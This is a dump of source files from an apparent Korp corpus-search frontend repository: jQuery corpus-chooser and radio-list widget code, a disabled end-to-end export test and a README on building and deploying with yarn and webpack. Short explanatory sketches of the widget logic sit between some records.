$(\".scroll_checkboxes\").mousedown(function (e) {\n if ($(this).siblings(\".popupchecks\").css(\"display\") == \"block\") {\n $(\".popupchecks\").fadeOut(\"fast\")\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n $(\".hp_topframe\").removeClass(\"ui-corner-top\")\n } else {\n $(\".popupchecks\")\n .show()\n .css({\n position: \"absolute\",\n top: $(\"#corpusbox\").offset().top + $(\"#corpusbox\").height() - 2,\n left: $(\"#corpusbox\").offset().left,\n })\n hp_this._trigger(\"open\")\n $(\".hp_topframe\").addClass(\"ui-corner-top\")\n }\n e.stopPropagation()\n })\n\n $(\".scroll_checkboxes\")\n .unbind(\"click\")\n .click(function (e) {\n e.stopPropagation()\n })\n\n // Prevent clicking through the box\n $(\".popupchecks\")\n .unbind(\"click\")\n .click(function (e) {\n e.stopPropagation()\n })\n\n /* SELECT ALL BUTTON */\n $(\".selectall\")\n .unbind(\"click\")\n .click(function () {\n hp_this.setStatus(\n $(\".boxlabel .checkbox, div.checks .boxdiv:not(.disabled) .checkbox\"),\n \"checked\"\n )\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n return false\n })\n\n /* SELECT NONE BUTTON */\n $(\".selectnone\")\n .unbind(\"click\")\n .click(function () {\n hp_this.setStatus(\n $(\".boxlabel .checkbox, div.checks .boxdiv:not(.disabled) .checkbox\"),\n \"unchecked\"\n )\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n return false\n })\n\n $(\".ext\")\n .unbind(\"click\")\n .click(function () {\n $(\".corpusInfoSpace\").fadeOut(\"fast\")\n if ($(this).parent().hasClass(\"collapsed\")) {\n $(this).parent().removeClass(\"collapsed\").addClass(\"extended\")\n $(this).siblings(\"div\").fadeToggle(\"fast\")\n } else {\n $(this).parent().removeClass(\"extended\").addClass(\"collapsed\")\n $(this).siblings(\"div\").fadeToggle(\"fast\")\n }\n })\n\n $(\".boxlabel\")\n .unbind(\"click\") // \"folders\"\n .click(function (event) {\n let isLinux = window.navigator.userAgent.indexOf(\"Linux\") != -1\n\n if (!$(this).parent().hasClass(\"disabled\")) {\n if (!isLinux && event.altKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n } else if (isLinux && event.ctrlKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n }\n if ($(this).is(\".disabled\")) return\n hp_this.updateState($(this).parent())\n var childMan = $(this).children(\".checkbox\")\n var checkedAllUnlocked =\n childMan.hasClass(\"intermediate\") &&\n childMan.parent().siblings(\"div:not(.disabled)\").length ===\n childMan.parent().siblings().find(\".checked\").length\n if (childMan.hasClass(\"checked\") || checkedAllUnlocked) {\n // Checked, uncheck it if not the root of a tree\n if (!$(this).parent().hasClass(\"tree\")) {\n hp_this.setStatus(childMan, \"unchecked\")\n } else {\n var descendants = childMan.parent().siblings(\"div\").find(\".checkbox\")\n hp_this.setStatus(descendants, \"unchecked\")\n }\n } else {\n // Unchecked, check it unless it's intermediate and all unchecked ones are locked\n hp_this.setStatus(childMan, \"checked\")\n if ($(this).parent().hasClass(\"tree\")) {\n // If tree, check all descendants\n descendants = childMan\n .parent()\n .siblings(\"div:not(.disabled)\")\n .find(\".checkbox\")\n hp_this.setStatus(descendants, \"checked\")\n }\n }\n var ancestors = childMan.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n }\n })\n\n var 
hoverConfig = {\n over: function () {\n // Fire callback \"infoPopup\":\n var callback = hp_this.options.infoPopup\n var returnValue = \"\"\n var inValue = \"\"\n var idstring = $(this).find(\"span\").attr(\"id\")\n if (idstring != \"\") {\n inValue = idstring.slice(9)\n }\n if ($.isFunction(callback)) returnValue = callback(inValue)\n $(\".corpusInfoSpace\").css({ top: $(this).offset().top })\n $(\".corpusInfoSpace\").find(\"p\").html(returnValue)\n $(\".corpusInfoSpace\").fadeIn(\"fast\")\n // $(\".corpusInfoSpace\").css({\"display\": \"block\"});\n },\n interval: 200, // number = milliseconds delay before onMouseOut\n out: function () {\n /* $(\".corpusInfoSpace\").fadeOut('fast');\n //$(\".corpusInfoSpace\").css({\"display\": \"none\"}); */\n },\n }\n\n var hoverFolderConfig = {\n over: function () {\n var callback = hp_this.options.infoPopupFolder\n var returnValue = \"\"\n var indata = []\n var boxes = $(this).parent().find(\".boxdiv\")\n var corpusID = []\n boxes.each(function (index) {\n corpusID.push($(this).find(\"span\").attr(\"id\").slice(9))\n })\n indata[\"corporaID\"] = corpusID\n var desc = $(this).parent().attr(\"data\").split(\"___\")[1]\n if (!desc) {\n desc = \"\"\n }\n indata[\"description\"] = unescape(desc)\n indata[\"title\"] = $(this).parent().attr(\"data\").split(\"___\")[0]\n if ($.isFunction(callback)) returnValue = callback(indata)\n $(\".corpusInfoSpace\").css({\n top: $(this).parent().offset().top,\n })\n $(\".corpusInfoSpace\").find(\"p\").html(returnValue)\n $(\".corpusInfoSpace\").fadeIn(\"fast\")\n },\n interval: 200,\n out: function () {},\n }\n\n $(\".boxdiv\").hoverIntent(hoverConfig)\n $(\".boxlabel\").hoverIntent(hoverFolderConfig)\n\n $(\".boxdiv\").unbind(\"click\") // \"Non-folder items\"\n $(\".boxdiv\").click(function (event) {\n if ($(this).is(\".disabled\")) return\n let isLinux = window.navigator.userAgent.indexOf(\"Linux\") != -1\n if (!isLinux && event.altKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n } else if (isLinux && event.ctrlKey == 1) {\n $(\".checkbox\").each(function () {\n hp_this.setStatus($(this), \"unchecked\")\n })\n }\n\n hp_this.updateState($(this))\n var childMan = $(this).children(\"label\").children(\".checkbox\")\n if (childMan.hasClass(\"checked\")) {\n hp_this.setStatus(childMan, \"unchecked\")\n } else {\n hp_this.setStatus(childMan, \"checked\")\n }\n var ancestors = childMan.parents(\".tree\")\n ancestors.each(function () {\n hp_this.updateState($(this))\n })\n hp_this.countSelected()\n // Fire callback \"change\":\n hp_this.triggerChange()\n })\n function wrapWithSpan(htmlStr) {\n return \"<span>\" + htmlStr + \"</span>\"\n }\n function recursive_transform(einHTML, levelindent) {\n var outStr = \"\"\n var ul = $(einHTML).children()\n var hasDirectCorporaChildren = false\n ul = ul.each(function (index) {\n var theHTML = $(this).html()\n if (theHTML != null) {\n var leftattrib = 0\n var item_id = $(this).attr(\"id\")\n if (item_id == null) item_id = \"\"\n\n if (item_id != \"\") {\n hp_this.totalTokenCount += parseInt(\n settings.corpora[item_id][\"info\"][\"Size\"]\n )\n item_id = \"hpcorpus_\" + item_id\n }\n\n if (theHTML.indexOf(\"<li\") != -1 || theHTML.indexOf(\"<LI\") != -1) {\n var cssattrib = \"\"\n if (levelindent > 0) {\n leftattrib = 30\n cssattrib += \"margin-left:\" + leftattrib + \"px; display:none\"\n }\n var foldertitle = $(this).children(\"ul\").attr(\"title\")\n var folderdescription = $(this).children(\"ul\").attr(\"description\")\n if 
(folderdescription == \"undefined\") folderdescription = \"\"\n outStr +=\n '<div data=\"' +\n foldertitle +\n \"___\" +\n folderdescription +\n '\" style=\"' +\n cssattrib +\n '\" class=\"tree collapsed ' +\n levelindent +\n '\"><img src=\"' +\n collapsedImg +\n '\" alt=\"extend\" class=\"ext\"/> <label class=\"boxlabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox checked\"/> <span>' +\n foldertitle +\n ' </span><span class=\"numberOfChildren\">(?)</span></label>'\n\n outStr += recursive_transform(theHTML, levelindent + 1)\n outStr += \"</div>\"\n } else {\n var disable =\n settings.corpora[$(this).attr(\"id\")].limitedAccess === true &&\n !authenticationProxy.hasCred($(this).attr(\"id\"))\n\n if (levelindent > 0) {\n // Indragna och gömda per default\n hasDirectCorporaChildren = true\n outStr +=\n '<div data=\"' +\n theHTML +\n '\" class=\"boxdiv' +\n (disable ? \" disabled\" : \"\") +\n '\" style=\"margin-left:46px; display:none; background-color:' +\n settings.primaryColor +\n '\"><label class=\"hplabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox ' +\n (disable ? \" unchecked\" : \"checked\") +\n '\"></span> ' +\n wrapWithSpan(theHTML) +\n \" </label></div>\"\n } else {\n if (index != ul.length) {\n hasDirectCorporaChildren = true\n outStr +=\n '<div data=\"' +\n theHTML +\n '\" class=\"boxdiv' +\n (disable ? \" disabled\" : \"\") +\n '\" style=\"margin-left:16px; background-color:' +\n settings.primaryColor +\n '\"><label class=\"hplabel\"><span id=\"' +\n item_id +\n '\" class=\"checkbox ' +\n (disable ? \" unchecked\" : \"checked\") +\n '\"></span> ' +\n wrapWithSpan(theHTML) +\n \" </label></div>\"\n }\n }\n }\n }\n })\n if (!hasDirectCorporaChildren) {\n outStr +=\n '<div class=\"extra_fill\" style=\"height:2px; display:none; visible:false\"></div>'\n }\n\n return outStr\n }\n },\n}\n\nlet widget = require(\"components-jqueryui/ui/widget\")\nwidget(\"hp.corpusChooser\", hp_corpusChooser) // create the widget\n"
},
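`updateState` in the `selector_widget.js` entry above derives a folder checkbox's tri-state from its leaf corpora. The counting rule, extracted into a pure function for clarity (a sketch, not part of the widget itself):

```js
// A folder is "intermediate" when it mixes checked and unchecked leaves,
// otherwise it takes the state of whichever kind is present.
function folderState(leafStates) {
  const checked = leafStates.filter((s) => s === "checked").length;
  const unchecked = leafStates.filter((s) => s === "unchecked").length;
  if (checked > 0 && unchecked > 0) return "intermediate";
  return checked > 0 ? "checked" : "unchecked";
}

console.log(folderState(["checked", "unchecked", "checked"])); // "intermediate"
console.log(folderState(["unchecked", "unchecked"]));          // "unchecked"
```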
{
"alpha_fraction": 0.381863534450531,
"alphanum_fraction": 0.38459694385528564,
"avg_line_length": 38.12382888793945,
"blob_id": "328ec6f4ae4c67c476a3e460ac46df927fd57c21",
"content_id": "f678c171a2e6434667a222de9e42813b808c8c56",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 20853,
"license_type": "permissive",
"max_line_length": 125,
"num_lines": 533,
"path": "/app/scripts/widgets.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/** @format */\nlet widget = require(\"components-jqueryui/ui/widget\")\n// const Sidebar = {\n// _init() {},\n\n// updateContent(sentenceData, wordData, corpus, tokens, inReadingMode) {\n// this.element.html('<div id=\"selected_sentence\" /><div id=\"selected_word\" />')\n// // TODO: this is pretty broken\n// const corpusObj = settings.corpora[corpus] || settings.corpusListing.get(corpus)\n\n// const corpusInfo = $(\"<div />\").html(\n// `<h4 rel='localize[corpus]'></h4> <p>${corpusObj.title}</p>`\n// )\n// corpusInfo.prependTo(\"#selected_sentence\")\n\n// if (!inReadingMode && corpusObj.readingMode) {\n// $(\"<div class='openReadingMode'/>\")\n// .html(`<span class=\"link\" rel=\"localize[read_in_korp]\"></span>`)\n// .click(function () {\n// const aScope = angular\n// .element(document.getElementById(\"results-wrapper\"))\n// .scope()\n// safeApply(aScope.$root, () =>\n// aScope.$root.textTabs.push({\n// corpus: corpus,\n// sentenceId: sentenceData.sentence_id,\n// })\n// )\n// })\n// .prependTo(corpusInfo)\n// }\n\n// const customData = { pos: [], struct: [] }\n// if (!$.isEmptyObject(corpusObj.customAttributes)) {\n// const [word, sentence] = this.renderCustomContent(\n// wordData,\n// sentenceData,\n// corpusObj.customAttributes,\n// tokens\n// )\n// customData.pos = word\n// customData.struct = sentence\n// }\n\n// let posData = []\n// if (!$.isEmptyObject(corpusObj.attributes)) {\n// posData = this.renderCorpusContent(\n// \"pos\",\n// wordData,\n// sentenceData,\n// corpusObj.attributes,\n// tokens,\n// corpusObj.customAttributes || {},\n// customData.pos\n// )\n// }\n// let structData = []\n// if (!$.isEmptyObject(corpusObj.structAttributes)) {\n// structData = this.renderCorpusContent(\n// \"struct\",\n// wordData,\n// sentenceData,\n// corpusObj.structAttributes,\n// tokens,\n// corpusObj.customAttributes || {},\n// customData.struct\n// )\n// }\n\n// $(\"#selected_word\").append($(\"<h4>\").localeKey(\"word_attr\"))\n// $(\"#selected_sentence\").append($(\"<h4>\").localeKey(\"sentence_attr\"))\n// $(\"#selected_word\").append(posData)\n// $(\"#selected_sentence\").append(structData)\n\n// this.element.localize()\n// this.applyEllipse()\n// if (corpusObj.attributes.deprel) {\n// this.renderGraph(tokens)\n// }\n// },\n\n// renderGraph(tokens) {\n// if (!tokens || tokens.length == 0) {\n// return\n// }\n// $(\"<span class='link show_deptree'></button>\")\n// .localeKey(\"show_deptree\")\n// .click(function () {\n// const outerW = $(window).width() - 80\n// const info = $(\"<span class='info' />\")\n// const iframe = $('<iframe src=\"lib/deptrees/deptrees.html\"></iframe>')\n// .css(\"width\", outerW - 40)\n// .on(\"load\", function () {\n// const wnd = this.contentWindow\n// wnd.draw_deptree.call(wnd, tokens, function (msg) {\n// const [type, val] = _.head(_.toPairs(msg))\n// info.empty().append(\n// $(\"<span>\").localeKey(type),\n// $(\"<span>: </span>\"),\n// $(\"<span>\").localeKey(`${type}_${val}`)\n// )\n// })\n// })\n\n// $(\"#deptree_popup\")\n// .empty()\n// .append(info, iframe)\n// .dialog({\n// height: 300,\n// width: outerW,\n// })\n// .parent()\n// .find(\".ui-dialog-title\")\n// .localeKey(\"dep_tree\")\n// })\n// .appendTo(this.element)\n// },\n\n// renderCorpusContent(\n// type,\n// wordData,\n// sentenceData,\n// corpus_attrs,\n// tokens,\n// customAttrs,\n// customData\n// ) {\n// let pairs\n// if (type === \"struct\") {\n// pairs = _.toPairs(sentenceData)\n// } else if (type === \"pos\") {\n// pairs = _.toPairs(wordData)\n// }\n\n// pairs = 
_.filter(pairs, function (...args) {\n// let [key, val] = args[0]\n// return corpus_attrs[key]\n// })\n// pairs = _.filter(pairs, function (...args) {\n// let [key, val] = args[0]\n// return !(corpus_attrs[key].displayType === \"hidden\" || corpus_attrs[key].hideSidebar)\n// })\n\n// for (let custom of customData) {\n// pairs.push(custom)\n// }\n\n// pairs.sort(function (...args) {\n// let ord1, ord2\n// const [a] = args[0]\n// const [b] = args[1]\n// if (a in corpus_attrs) {\n// ord1 = corpus_attrs[a].order\n// } else {\n// ord1 = customAttrs[a].order\n// }\n\n// if (b in corpus_attrs) {\n// ord2 = corpus_attrs[b].order\n// } else {\n// ord2 = customAttrs[b].order\n// }\n\n// if (_.isUndefined(ord1)) {\n// ord1 = 10000\n// }\n// if (_.isUndefined(ord2)) {\n// ord2 = 10000\n// }\n// return ord1 - ord2\n// })\n\n// let items = []\n// for (let [key, value] of pairs) {\n// if (key in customAttrs) {\n// items.push(value)\n// } else {\n// items = items.concat(\n// (\n// this.renderItem(\n// key,\n// value,\n// corpus_attrs[key],\n// wordData,\n// sentenceData,\n// tokens\n// ) || $()\n// ).get(0) || []\n// )\n// }\n// }\n\n// items = _.compact(items)\n// return $(items)\n// },\n\n// renderCustomContent(wordData, sentenceData, corpus_attrs, tokens) {\n// const structItems = []\n// const posItems = []\n// for (let key in corpus_attrs) {\n// const attrs = corpus_attrs[key]\n// try {\n// const output = (\n// this.renderItem(key, \"not_used\", attrs, wordData, sentenceData, tokens) || $()\n// ).get(0)\n// if (attrs.customType === \"struct\") {\n// structItems.push([key, output])\n// } else if (attrs.customType === \"pos\") {\n// posItems.push([key, output])\n// }\n// } catch (e) {\n// c.log(\"failed to render custom attribute\", e)\n// }\n// }\n// return [posItems, structItems]\n// },\n\n// renderItem(key, value, attrs, wordData, sentenceData, tokens) {\n// let lis, output, pattern, ul, valueArray\n// let val, inner, cqpVal, li, address\n// if (attrs.label) {\n// output = $(`<p><span rel='localize[${attrs.label}]'></span>: </p>`)\n// } else {\n// output = $(\"<p></p>\")\n// }\n// if (attrs.renderItem) {\n// return output.append(\n// attrs.renderItem(key, value, attrs, wordData, sentenceData, tokens)\n// )\n// }\n\n// output.data(\"attrs\", attrs)\n// if (value === \"|\" || value === \"\" || value === null) {\n// output.append(\n// `<i rel='localize[empty]' style='color : grey'>${util.getLocaleString(\"empty\")}</i>`\n// )\n// return output\n// }\n\n// if (attrs.type === \"set\" && attrs.display && attrs.display.expandList) {\n// valueArray = _.filter((value && value.split(\"|\")) || [], Boolean)\n// const attrSettings = attrs.display.expandList\n// if (attrs.ranked) {\n// valueArray = _.map(valueArray, function (value) {\n// val = value.split(\":\")\n// return [val[0], val[val.length - 1]]\n// })\n\n// lis = []\n\n// for (let outerIdx = 0; outerIdx < valueArray.length; outerIdx++) {\n// var externalLink\n// let [value, prob] = valueArray[outerIdx]\n// li = $(\"<li></li>\")\n// const subValues = attrSettings.splitValue\n// ? 
attrSettings.splitValue(value)\n// : [value]\n// for (let idx = 0; idx < subValues.length; idx++) {\n// const subValue = subValues[idx]\n// val = (attrs.stringify || attrSettings.stringify || _.identity)(subValue)\n// inner = $(`<span>${val}</span>`)\n// inner.attr(\"title\", prob)\n\n// if (\n// attrs.internalSearch &&\n// (attrSettings.linkAllValues || outerIdx === 0)\n// ) {\n// inner.data(\"key\", subValue)\n// inner.addClass(\"link\").click(function () {\n// const searchKey = attrSettings.searchKey || key\n// cqpVal = $(this).data(\"key\")\n// const cqpExpr = attrSettings.internalSearch\n// ? attrSettings.internalSearch(searchKey, cqpVal)\n// : `[${searchKey} contains '${regescape(cqpVal)}']`\n// return locationSearch({ search: \"cqp\", cqp: cqpExpr, page: null })\n// })\n// }\n// if (attrs.externalSearch) {\n// address = _.template(attrs.externalSearch)({ val: subValue })\n// externalLink = $(\n// `<a href='${address}' class='external_link' target='_blank' style='margin-top: -6px'></a>`\n// )\n// }\n\n// li.append(inner)\n// if (attrSettings.joinValues && idx !== subValues.length - 1) {\n// li.append(attrSettings.joinValues)\n// }\n// }\n// if (externalLink) {\n// li.append(externalLink)\n// }\n// lis.push(li)\n// }\n// } else {\n// lis = []\n// for (value of valueArray) {\n// li = $(\"<li></li>\")\n// li.append(value)\n// lis.push(li)\n// }\n// }\n\n// if (lis.length === 0) {\n// ul = $('<i rel=\"localize[empty]\" style=\"color : grey\"></i>')\n// } else {\n// ul = $(\"<ul style='list-style:initial'>\")\n// ul.append(lis)\n\n// if (lis.length !== 1 && !attrSettings.showAll) {\n// _.map(lis, function (li, idx) {\n// if (idx !== 0) {\n// return li.css(\"display\", \"none\")\n// }\n// })\n\n// const showAll = $(\n// `<span class='link' rel='localize[complemgram_show_all]'></span><span> (${\n// lis.length - 1\n// })</span>`\n// )\n// ul.append(showAll)\n\n// const showOne = $(\n// \"<span class='link' rel='localize[complemgram_show_one]'></span>\"\n// )\n// showOne.css(\"display\", \"none\")\n// ul.append(showOne)\n\n// showAll.click(function () {\n// showAll.css(\"display\", \"none\")\n// showOne.css(\"display\", \"inline\")\n// return _.map(lis, (li) => li.css(\"display\", \"list-item\"))\n// })\n\n// showOne.click(function () {\n// showAll.css(\"display\", \"inline\")\n// showOne.css(\"display\", \"none\")\n// _.map(lis, function (li, i) {\n// if (i !== 0) {\n// return li.css(\"display\", \"none\")\n// }\n// })\n// })\n// }\n// }\n\n// output.append(ul)\n// return output\n// } else if (attrs.type === \"set\") {\n// pattern = attrs.pattern || '<span data-key=\"<%= key %>\"><%= val %></span>'\n// ul = $(\"<ul>\")\n// const getStringVal = (str) =>\n// _.reduce(\n// _.invokeMap(_.invokeMap(str, \"charCodeAt\", 0), \"toString\"),\n// (a, b) => a + b\n// )\n// valueArray = _.filter((value && value.split(\"|\")) || [], Boolean)\n// if (key === \"variants\") {\n// // TODO: this doesn't sort quite as expected\n// valueArray.sort(function (a, b) {\n// const splita = util.splitLemgram(a)\n// const splitb = util.splitLemgram(b)\n// const strvala =\n// getStringVal(splita.form) + splita.index + getStringVal(splita.pos)\n// const strvalb =\n// getStringVal(splitb.form) + splitb.index + getStringVal(splitb.pos)\n\n// return parseInt(strvala) - parseInt(strvalb)\n// })\n// }\n\n// const itr = _.isArray(valueArray) ? 
valueArray : _.values(valueArray)\n// const lis = []\n// for (let x of itr) {\n// if (x.length) {\n// val = (attrs.stringify || _.identity)(x)\n\n// inner = $(_.template(pattern)({ key: x, val }))\n// if (attrs.translationKey != null) {\n// const prefix = attrs.translationKey || \"\"\n// inner.localeKey(prefix + val)\n// }\n\n// if (attrs.internalSearch) {\n// inner.addClass(\"link\").click(function () {\n// cqpVal = $(this).data(\"key\")\n// return locationSearch({\n// page: null,\n// search: \"cqp\",\n// cqp: `[${key} contains \\\"${regescape(cqpVal)}\\\"]`,\n// })\n// })\n// }\n\n// li = $(\"<li></li>\").data(\"key\", x).append(inner)\n// if (attrs.externalSearch) {\n// address = _.template(attrs.externalSearch)({ val: x })\n// li.append(\n// $(`<a href='${address}' class='external_link' target='_blank'></a>`)\n// )\n// }\n\n// lis.push(li)\n// }\n// }\n// ul.append(lis)\n// output.append(ul)\n\n// return output\n// }\n\n// const str_value = (attrs.stringify || _.identity)(value)\n\n// if (attrs.type === \"url\") {\n// return output.append(\n// `<a href='${str_value}' class='exturl sidebar_url' target='_blank'>${decodeURI(\n// str_value\n// )}</a>`\n// )\n// } else if (key === \"msd\") {\n// // msdTags = require '../markup/msdtags.html'\n// const msdTags = \"markup/msdtags.html\"\n// return output.append(`<span class='msd_sidebar'>${str_value}</span>\n// <a href='${msdTags}' target='_blank'>\n// <span class='sidebar_info ui-icon ui-icon-info'></span>\n// </a>\n// </span>\\\n// `)\n// } else if (attrs.pattern) {\n// return output.append(\n// _.template(attrs.pattern)({\n// key,\n// val: str_value,\n// pos_attrs: wordData,\n// struct_attrs: sentenceData,\n// })\n// )\n// } else {\n// if (attrs.translationKey) {\n// if (window.loc_data[\"en\"][attrs.translationKey + value]) {\n// return output.append(\n// `<span rel='localize[${attrs.translationKey}${value}]'></span>`\n// )\n// } else {\n// return output.append(`<span>${value}</span>`)\n// }\n// } else {\n// return output.append(`<span>${str_value || \"\"}</span>`)\n// }\n// }\n// },\n\n// applyEllipse() {\n// // oldDisplay = @element.css(\"display\")\n// // @element.css \"display\", \"block\"\n// const totalWidth = this.element.width()\n\n// // ellipse for too long links of type=url\n// this.element\n// .find(\".sidebar_url\")\n// .css(\"white-space\", \"nowrap\")\n// .each(function () {\n// while ($(this).width() > totalWidth) {\n// const oldtext = $(this).text()\n// const a = _.trim(oldtext, \"/\").replace(\"...\", \"\").split(\"/\")\n// const domain = a.slice(2, 3)\n// let midsection = a.slice(3).join(\"/\")\n// midsection = `...${midsection.slice(2)}`\n// $(this).text([\"http:/\"].concat(domain, midsection).join(\"/\"))\n// if (midsection === \"...\") {\n// break\n// }\n// }\n// })\n// },\n\n// updatePlacement() {\n// const max = Math.round($(\"#columns\").position().top)\n// if ($(window).scrollTop() < max) {\n// return this.element.removeClass(\"fixed\")\n// } else if ($(\"#left-column\").height() > $(\"#sidebar\").height()) {\n// return this.element.addClass(\"fixed\")\n// }\n// },\n// }\n\n// widget(\"korp.sidebar\", Sidebar)\n\nwidget(\"korp.radioList\", {\n options: {\n change: $.noop,\n separator: \"|\",\n selected: \"default\",\n },\n\n _create() {\n this._super()\n const self = this\n $.each(this.element, function () {\n // $.proxy(self.options.change, self.element)();\n return $(this)\n .children()\n .wrap(\"<li />\")\n .click(function () {\n if (!$(this).is(\".radioList_selected\")) {\n self.select($(this).data(\"mode\"))\n 
return self._trigger(\"change\", $(this).data(\"mode\"))\n }\n })\n .parent()\n .prepend($(\"<span>\").text(self.options.separator))\n .wrapAll(\"<ul class='inline_list' />\")\n })\n\n this.element.find(\".inline_list span:first\").remove()\n return this.select(this.options.selected)\n },\n\n select(mode) {\n this.options.selected = mode\n const target = this.element.find(\"a\").filter(function () {\n return $(this).data(\"mode\") === mode\n })\n this.element.find(\".radioList_selected\").removeClass(\"radioList_selected\")\n this.element.find(target).addClass(\"radioList_selected\")\n return this.element\n },\n\n getSelected() {\n return this.element.find(\".radioList_selected\")\n },\n})\n"
},
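`radioList.select` in the entry above keeps exactly one link marked as selected, keyed by its `data-mode` value. The same invariant expressed in plain DOM code (a sketch; the widget itself remains jQuery-based):

```js
// Mark exactly one anchor as selected, keyed by its data-mode attribute;
// toggling with a boolean force flag clears every other item in one pass.
function select(listEl, mode) {
  for (const a of listEl.querySelectorAll("a")) {
    a.classList.toggle("radioList_selected", a.dataset.mode === mode);
  }
}
```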
{
"alpha_fraction": 0.6223990321159363,
"alphanum_fraction": 0.6266829967498779,
"avg_line_length": 40.89743423461914,
"blob_id": "427a4c391551180951c2cdad44bdb9c1cfb36f17",
"content_id": "5362a48e09363a7cfbeb2dc8a67d1ba6183f02da",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 1636,
"license_type": "permissive",
"max_line_length": 139,
"num_lines": 39,
"path": "/test/e2e/spec/statistics_export.js",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "/* eslint-disable\n no-undef,\n*/\n\ndescribe(\"stats table export\", function() {\n\n const waitFor = function(elm) {\n browser.wait(() => elm.isPresent())\n browser.wait(() => elm.isDisplayed())\n }\n\n xit(\"should be possible to get relative frequencies as CSV\", () =>\n browser.get(browser.params.url + \"#?corpus=suc2,suc3&search=lemgram|gå..vb.1&result_tab=2\").then(function() {\n\n const kindOfData = element(by.css(\"#kindOfData option:checked\"))\n const kindOfFormat = element(by.css(\"#kindOfFormat option:checked\"))\n\n expect(kindOfData.getText()).toMatch(/Relativa.*/)\n expect(kindOfFormat.getText()).toMatch(/CSV.*/)\n \n element(by.css(\"#generateExportButton\")).click()\n element(by.css(\"#exportButton\")).click()\n })\n).pend(\"disabled because tests will succeed even though export fails\")\n\n xit(\"should be possible to get absolute frequencies as TSV with multiple reduce parameters\", () =>\n browser.get(browser.params.url + \"#?result_tab=2&stats_reduce=word,msd,saldo&corpus=suc2,suc3&search=word|gå ut\").then(function() {\n\n const kindOfData = element(by.css(\"#kindOfData option:checked\"))\n const kindOfFormat = element(by.css(\"#kindOfFormat option:checked\"))\n\n expect(kindOfData.getText()).toMatch(/Relativa.*/)\n expect(kindOfFormat.getText()).toMatch(/CSV.*/)\n \n element(by.css(\"#generateExportButton\")).click()\n element(by.css(\"#exportButton\")).click()\n })\n).pend(\"disabled because tests will succeed even though export fails\")\n})\n"
},
{
"alpha_fraction": 0.72963547706604,
"alphanum_fraction": 0.7315372228622437,
"avg_line_length": 44.72463607788086,
"blob_id": "462409397c2da52b76f4a83300b05609b7a4a032",
"content_id": "a09fb3a146c854d30abeb371913f7148e480130d",
"detected_licenses": [
"MIT"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3157,
"license_type": "permissive",
"max_line_length": 285,
"num_lines": 69,
"path": "/README.md",
"repo_name": "UAlbertaALTLab/korp-frontend",
"src_encoding": "UTF-8",
"text": "# ALTLab Korp\n\nThis repo contains the [University of Alberta Language Technology Lab][ALTLab]'s (<abbr>ALTLab</abbr>) instance of [Korp][Korp], a tool for searching and visualizing natural language corpus data. Korp is developed by [Språkbanken][Spraakbanken] at the University of Gothenburg, Sweden.\n\n[View the frontend documentation for Korp here.][docs]\n\n## Getting started with developing Korp\n\n1. Install [yarn][yarn]\n - Korp must be developed with `yarn` rather than `npm`.\n\n1. Building Korp\n - install all dependencies: `yarn`\n - build a dev version: `yarn build`\n - build a dist version: set `NODE_ENV=production`, then `yarn build`\n\n1. Running Korp\n - run dev server: `yarn start:dev` or `yarn dev`\n - run dist server: `yarn start:dist` or `yarn start`\n\n1. Running tests\n - run tests: `yarn test` or `yarn test:karma` or `yarn test:e2e`\n - (tests currently depend on Språkbanken's setup; they will not pass locally)\n\n1. Deployment\n - `dev`: commits to `dev` are automatically deployed to `korp.altlab.dev` (see [deploy-dev.yml](https://github.com/UAlbertaALTLab/korp-frontend/blob/dev/.github/workflows/deploy-dev.yml))\n - `main`: commits to `main` are automatically deployed to `korp.altlab.app` (see [deploy-prod.yml](https://github.com/UAlbertaALTLab/korp-frontend/blob/dev/.github/workflows/deploy-prod.yml))\n\n## Configuration\n\nKorp uses `window.settings` to share needed configuration to `config.js` and `modes/common.js`.\n\n`config.js` and `modes/common.js` are included in webpack's dependency graph. Therefore it works to use `require` for anything needed, but only things that are in the configured location for settings.\n\n`mode`-files are only loaded at runtime an any dependencies must be required in `modes/common.js` and then exported as a module as shown in the sample file `app/modes/common.js`.\n\n## webpack\n\nKorp uses *webpack* to build Korp and *webpack-dev-server* to run a local server. To include new code or resources, require them where needed:\n\n```\nnd = require(`new-dependency`)\nnd.aFunction()\n```\n\nor\n\n```\nimgPath = require(`img/image.png`)\nmyTemplate = `<img src='${imgPath}'>`\n```\n\nMost dependencies are only specified in `app/index.js` and where needed added to the `window` object.\n\nAbout the current loaders in in `webpack.config.js`:\n\n- `pug` and `html` files: all `src`-attributes in `<img>` tags and all `href`s in `<link>` tags will be loaded by webpack and replaced in the markup. Uses file loader so that requiring a `pug` or `html` file will give the path to the file back.\n- `js` files are added to the bundle.\n- All images and fonts are added to the bundle using file loader and gives back a file path.\n- `css` and `scss` are added to the bundle. `url`s will be loaded and replaced by webpack.\n\nIn addition to this, some specific files will simply be copied as is, for example Korp mode-files.\n\n<!-- Links -->\n[ALTLab]: https://altlab.artsrn.ualberta.ca/\n[docs]: https://github.com/spraakbanken/korp-frontend/blob/master/doc/frontend_devel.md\n[Korp]: https://github.com/spraakbanken/korp-frontend\n[Spraakbanken]: https://spraakbanken.gu.se\n[yarn]: https://yarnpkg.com\n"
},
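The README above notes that mode files are loaded only at runtime, so their dependencies must be required in `modes/common.js` and re-exported. A sketch of that pattern (the dependency name is hypothetical):

```js
// app/modes/common.js — require once at build time, then hand the module
// to mode files that are loaded at runtime and cannot require() themselves.
const myDep = require("my-dep"); // hypothetical dependency

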